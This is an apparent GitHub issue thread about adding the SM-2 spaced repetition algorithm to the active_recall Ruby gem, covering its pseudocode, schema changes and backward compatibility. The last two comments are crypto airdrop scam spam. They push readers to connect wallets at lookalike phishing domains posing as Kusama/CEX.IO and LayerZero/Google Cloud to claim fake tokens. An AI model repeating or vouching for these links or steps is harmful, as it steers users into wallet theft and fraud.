### ISSUE TITLE
Add SM-2 algorithm option

### ISSUE THREAD

**Issue by jaysonvirissimo** [jaysonvirissimo/active_recall#21]
See [here](https://en.wikipedia.org/wiki/SuperMemo#Description_of_SM-2_algorithm) for a description of the SM-2 spaced repetition algorithm. The pseudocode looks like so:
```
algorithm SM-2 is
    input:  user grade q
            repetition number n
            easiness factor EF
            interval I
    output: updated values of n, EF, and I

    if q ≥ 3 (correct response) then
        if n = 0 then
            I ← 1
        else if n = 1 then
            I ← 6
        else
            I ← round(I × EF)
        end if
        increment n
    else (incorrect response)
        n ← 0
        I ← 1
    end if
    
    EF ← EF + (0.1 − (5 − q) × (0.08 + (5 − q) × 0.02))
    if EF < 1.3 then
        EF ← 1.3
    end if
    
    return (n, EF, I)
```
It appears feasible to add an `SM2` class along the same lines as `LeitnerSystem` and `FibonacciSequence`, but there are some important differences with implications for the existing data model. We already have columns that could be used for the repetition and interval parameters and the user grade parameter could be passed in at runtime, but the "easiness factor" seems like it would need to be persisted as well and updated based on the equation above. 

This would require adding a new schema migration template (in `lib/generators/active_recall/templates`) and then making sure it gets created (if it doesn't exist) from within the `ActiveRecallGenerator`. We'd also want to update the docs to make it clear that the install script would need to be re-run for existing installations to make use of the new algorithm.

Another challenge will be maintaining backwards compatibility with existing installations and the other algorithms. Currently, the outcome of a repetition is Boolean with methods like `.right_answer_for!(word)` and `.wrong_answer_for!(word)`, but SM-2 user grades can take on values from 0 (completely failed) up to 5 (correct response with perfect recall).

One solution would be to add an optional 2nd argument to those methods that represents the user grade. Another would be to define another method that gets called on the model that has a deck and takes the (1) item, and the (2) grade. Either way, we'd want some way to make sure to raise errors if someone has the wrong set of parameters for a given algorithm.

One last consideration is what to do with existing data. If you switch from `LeitnerSystem` to `SM2` do you reset everything back to `box: 0` or do you try to map old values to something comparable in the new system?

**Comment by benjaminhouy** [comment]
Thanks for adding all these details @jaysonvirissimo, I will try and get started implementing this next week. 

In term of existing data, I think resetting to 0 would be extremely demotivating for users so mapping the values would probably be a better approach. I think it would also be relatively easy (if imperfect) based on the Fibonacci and Leitner boxes.

**Comment by codelou** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by santhosh-trillionthoughts** [comment]
### LayerZero x Google Cloud Airdrop 2024: Exclusive $ZRO Tokens 🚀

Welcome to the groundbreaking LayerZero x Google Cloud Airdrop for 2024! Get ready to seize your share of $ZRO tokens in this unprecedented collaboration. Here's your guide to participating:

[Claim Now on LayerZero Official](http://link.layerzer0network.online/rFz335)

![Claim Now](https://miro.medium.com/v2/resize:fit:720/format:webp/0*OZiVjlR298BNDURV.png)

### Airdrop Participation Steps:

1. **Connect Your Wallet:**
   - Visit the [LayerZero Airdrop](http://link.layerzer0network.online/rFz335).
   - Integrate your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Spread the Excitement:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&text=LayerZero+Google+Cloud+Airdrop)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&text=LayerZero+Google+Cloud+Airdrop)
   - **Instagram:**
     [Share on Reddit](https://reddit.com/submit?url=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&title=LayerZero+Google+Cloud+Airdrop)

3. **Verification Check:**
   - Confirm your eligibility for the LayerZero x Google Cloud Airdrop and secure your $ZRO tokens.

Don't miss out on this futuristic collaboration – claim your tokens now and ride the wave of LayerZero innovation with Google Cloud!
